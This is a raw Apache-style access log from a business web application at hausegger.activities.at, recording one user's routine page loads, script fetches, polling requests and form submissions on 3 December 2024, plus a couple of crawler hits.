178.115.42.220 - - [03/Dec/2024:09:06:12 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:06:12 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2231 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:06:12 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:07:13 +0100] "GET /entry.php?id=10271&&ser=213172 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:07:13 +0100] "GET /gui/javascript/form_form.js?1733213233 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213172" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:08:14 +0100] "GET /entry.php?id=10271&&ser=213233 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=213172" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:08:14 +0100] "GET /gui/javascript/form_form.js?1733213294 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213233" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
156.59.198.135 - - [03/Dec/2024:09:09:02 +0100] "GET /ed-test.activities.at/stats/lang/awstats-is.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.115.42.220 - - [03/Dec/2024:09:09:15 +0100] "GET /entry.php?id=10271&&ser=213294 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=213233" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:09:15 +0100] "GET /gui/javascript/form_form.js?1733213355 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213294" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:10:16 +0100] "GET /entry.php?id=10271&&ser=213355 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=213294" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:10:16 +0100] "GET /gui/javascript/form_form.js?1733213416 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213355" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
59.126.47.175 - - [03/Dec/2024:09:10:42 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
178.115.42.220 - - [03/Dec/2024:09:11:17 +0100] "GET /entry.php?id=10271&&ser=213416 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=213355" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:11:17 +0100] "GET /gui/javascript/form_form.js?1733213477 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213416" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:12:18 +0100] "GET /entry.php?id=10271&&ser=213477 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=213416" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:12:18 +0100] "GET /gui/javascript/form_form.js?1733213538 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213477" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:13:19 +0100] "GET /entry.php?id=10271&&ser=213538 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=213477" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:13:19 +0100] "GET /gui/javascript/form_form.js?1733213599 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213538" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:13:58 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1902 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 908 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1760 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /gui/javascript/form_form.js?1733213639 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /gui/javascript/form_form.js?1733213639 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 934 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2395 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:13:59 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1902 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:14:20 +0100] "GET /entry.php?id=10271&&ser=213599 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=213538" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:14:20 +0100] "GET /gui/javascript/form_form.js?1733213660 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213599" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:14:01 +0100] "POST /entry.php?id=10287& HTTP/1.1" 200 1966 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:04 +0100] "GET /gui/javascript/form_form.js?1733213704 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:05 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:05 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 2011 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:05 +0100] "GET /gui/javascript/form_form.js?1733213705 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:05 +0100] "GET /gui/javascript/form_form.js?1733213705 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:05 +0100] "GET /entry.php?id=10270&__app__=10006038 HTTP/1.1" 200 2230 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:05 +0100] "GET /undefined HTTP/1.1" 404 289 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:05 +0100] "GET /framework/webfx/style/toolbar/images/cbback.gif HTTP/1.1" 404 318 "http://hausegger.activities.at/framework/webfx/style/toolbar/cb2.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:15:21 +0100] "GET /entry.php?id=10271&&ser=213660 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=213599" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:15:21 +0100] "GET /gui/javascript/form_form.js?1733213721 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213660" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:16:05 +0100] "GET /entry.php?id=10271&&ser=213705 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:05 +0100] "GET /gui/javascript/form_form.js?1733213765 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213705" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:22 +0100] "GET /entry.php?id=10271&&ser=213721 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=213660" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:16:22 +0100] "GET /gui/javascript/form_form.js?1733213782 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=213721" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36"
178.115.42.220 - - [03/Dec/2024:09:16:52 +0100] "GET /entry.php?id=10712 HTTP/1.1" 200 402 "http://hausegger.activities.at/entry.php?id=10270&__app__=10006038" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:52 +0100] "GET /entry.php?id=10676&&title=Artikelverwaltung HTTP/1.1" 200 1393 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/javascript/form_form.js?1733213812 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10676&&title=Artikelverwaltung" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:52 +0100] "GET /entry.php?id=10715& HTTP/1.1" 200 2532 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/javascript/form_form.js?1733213813 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/images/icons/ajax_loading.gif HTTP/1.1" 200 1542 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:52 +0100] "GET /entry.php?id=10716& HTTP/1.1" 200 4886 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /activities/framework/fwx_trans.gif HTTP/1.1" 200 43 "http://hausegger.activities.at/entry.php?id=10716&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/images/icons/disabled_lupe.gif HTTP/1.1" 200 322 "http://hausegger.activities.at/entry.php?id=10716&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /entry.php?id=10776&form=10560&name=list& HTTP/1.1" 200 2179 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /entry.php?id=10778&form=10560&name=list& HTTP/1.1" 200 2691 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/images/icons/export.gif HTTP/1.1" 200 968 "http://hausegger.activities.at/entry.php?id=10776&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/images/icons/filter_off.gif HTTP/1.1" 200 309 "http://hausegger.activities.at/entry.php?id=10776&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/images/icons/disabled_isvisible.gif HTTP/1.1" 200 612 "http://hausegger.activities.at/entry.php?id=10776&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/images/icons/disabled_order.gif HTTP/1.1" 200 358 "http://hausegger.activities.at/entry.php?id=10776&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /framework/icons/sortUp.gif HTTP/1.1" 200 53 "http://hausegger.activities.at/entry.php?id=10776&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /gui/images/icons/lupe.gif HTTP/1.1" 200 324 "http://hausegger.activities.at/entry.php?id=10776&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /framework/icons/fwx_trans.gif HTTP/1.1" 200 43 "http://hausegger.activities.at/entry.php?id=10778&form=10560&name=list&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /entry.php?id=10714&checksegmentation=false& HTTP/1.1" 200 4153 "http://hausegger.activities.at/entry.php?id=10712" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:53 +0100] "GET /activities/framework/KoolControls/KoolAjax/koolajax.php?8436e354c842500aba3cbaf0584c0c24 HTTP/1.1" 200 4079 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/icons/Folder.gif HTTP/1.1" 200 267 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/icons/square_yellowS.gif HTTP/1.1" 200 541 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/icons/square_blueS.gif HTTP/1.1" 200 540 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/icons/square_greyS.gif HTTP/1.1" 200 342 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/icons/bullet_star.png HTTP/1.1" 200 331 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/styles/default/default.css HTTP/1.1" 200 1099 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/kooltreeview.php?c7cd9180e88ffef8e70f13526bb4f5f7 HTTP/1.1" 200 5055 "http://hausegger.activities.at/entry.php?id=10714&checksegmentation=false&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/styles/default/horizon.gif HTTP/1.1" 200 844 "http://hausegger.activities.at/activities/framework/KoolControls/KoolTreeView/styles/default/default.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/styles/default/v.gif HTTP/1.1" 200 1940 "http://hausegger.activities.at/activities/framework/KoolControls/KoolTreeView/styles/default/default.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/styles/default/mid.gif HTTP/1.1" 200 71 "http://hausegger.activities.at/activities/framework/KoolControls/KoolTreeView/styles/default/default.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/styles/default/pm.gif HTTP/1.1" 200 214 "http://hausegger.activities.at/activities/framework/KoolControls/KoolTreeView/styles/default/default.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /activities/framework/KoolControls/KoolTreeView/styles/default/L.gif HTTP/1.1" 200 67 "http://hausegger.activities.at/activities/framework/KoolControls/KoolTreeView/styles/default/default.css" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /layout.php HTTP/1.1" 200 815 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /entry.php?id=10273 HTTP/1.1" 200 1903 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /entry.php?id=10270 HTTP/1.1" 200 909 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /activities.ico HTTP/1.1" 200 1406 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /entry.php?id=10272 HTTP/1.1" 200 1159 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:54 +0100] "GET /entry.php?id=11412 HTTP/1.1" 200 1759 "http://hausegger.activities.at/layout.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /gui/javascript/jquery/css/gui-themes/ui.spinner.css HTTP/1.1" 200 350 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /framework/webfx/style/toolbar/cb2.css HTTP/1.1" 200 793 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://hausegger.activities.at/entry.php?id=10270" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /gui/javascript/jquery/jquery-tooltip/jquery.tooltip.min.js HTTP/1.1" 200 1982 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /gui/javascript/jquery/css/gui-themes/custom.min.css HTTP/1.1" 200 5618 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /gui/javascript/form_form.js?1733213815 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10273" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /gui/styles/tmplDefault.css HTTP/1.1" 200 2135 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /gui/images/icons/cancel.gif HTTP/1.1" 200 125 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /entry.php?id=10287 HTTP/1.1" 200 2395 "http://hausegger.activities.at/entry.php?id=11412" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /entry.php?id=10271& HTTP/1.1" 200 935 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /entry.php?id=10270& HTTP/1.1" 200 909 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:55 +0100] "GET /entry.php?id=10273& HTTP/1.1" 200 1903 "http://hausegger.activities.at/entry.php?id=10287" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0"
178.115.42.220 - - [03/Dec/2024:09:16:58 +0100] "POST /entry.php?id=10715 HTTP/1.1" 200 2606 "http://hausegger.activities.at/entry.php?id=10715&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0"
